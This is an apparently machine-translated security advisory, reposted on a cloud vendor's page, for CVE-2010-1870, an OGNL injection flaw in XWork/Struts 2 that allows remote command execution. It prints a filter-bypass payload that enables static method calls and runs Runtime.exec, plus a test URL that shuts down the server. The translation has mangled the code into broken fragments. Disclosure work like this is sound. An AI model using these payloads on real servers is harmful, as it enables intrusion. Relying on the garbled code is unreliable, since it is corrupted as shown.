Attackers can exploit XWork to bypass security restrictions and execute arbitrary commands.

Source: Internet
Author: User

Affected Systems:

OpenSymphony XWork <2.2.0
Apache Group Struts <2.2.0
Description:Cve id: CVE-2010-1870

XWork is a command mode framework that supports Struts 2 and other applications.

XWork has a vulnerability in processing user request parameter data. Remote attackers can exploit this vulnerability to execute arbitrary commands on the system.

In Struts2, The WebWork framework uses XWork to perform operations and calls based on HTTP parameter names. Each HTTP parameter name is processed as an OGNL (Object graphics Navigation language) statement, while OGNL will:

User. address. city = Bishkek & user [favoriteDrink] = kumys

Convert:

Action. getUser (). getAddress (). setCity ("Bishkek ")
Action. getUser (). setFavoriteDrink ("kumys ")

This is implemented through ParametersInterceptor and ValueStack. setValue () is called using the HTTP parameter provided by the user ().

In addition to obtaining and setting properties, OGNL also supports other functions:

* Method call: foo ()
* Static call: @ java. lang. System @ exit (1)
* Build function call: new MyClass ()
* Process the context variable: # foo = new MyClass ()

Because the HTTP parameter is named OGNL, XWork uses the following two variable protection methods to prevent attackers from calling arbitrary methods through HTTP parameters:

* OgnlContext attribute xwork. MethodAccessor. denyMethodExecution (set to true by default)
* SecurityMemberAccess private field allowStaticMethodAccess (set to false by default)

To facilitate developers to access a variety of common objects, XWork provides some predefined context variables:

* # Application
* # Session
* # Request
* # Parameters
* # Attr
* # Context
* # _ MemberAccess
* # Root
* # This
* # _ TypeResolver
* # _ ClassResolver
* # _ TraceEvaluations
* # _ LastEvaluation
* # _ KeepLastEvaluation

These variables represent various Server objects. To prevent tampering with server objects, the ParametersInterceptor of XWork does not allow the parameter name to contain the "#" character. However, if the Java unicode string is used to represent u0023, attackers can bypass the protection, modify the value that protects Java execution:

# _ MemberAccess [allowStaticMethodAccess] = true
# Foo = new java. lang. Boolean ("false ")
# Context [xwork. MethodAccessor. denyMethodExecution] = # foo
# Rt = @ java. lang. Runtime @ getRuntime ()
Export rt.exe c (mkdir/tmp/PWNED)

<* Source: Meder Kydyraliev ( Bugtraq@web.areopag.net)

Link: Http://secunia.com/advisories/32495/
Http://www.exploit-db.com/exploits/14360/
*>

Test method:

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Http: // mydomain/MyStruts. action? (U0023_memberAccess [allowStaticMethodAccess]) (meh) = true & (aaa) (u0023context [xwork. methodAccessor. denyMethodExecution] u003du0023foo) (u0023foou003dnew % 20java. lang. boolean ("false") & (asdf) (u0023rt. exit (1) (u0023rtu003d@java.lang.Runtime @ getRuntime () = 1

Suggestion:Vendor patch:

Apache Group
------------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Vc? View = revision & revision = 956389 "target = _ blank> Http://svn.apache.org/viewvc? View = revision & revision = 956389

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.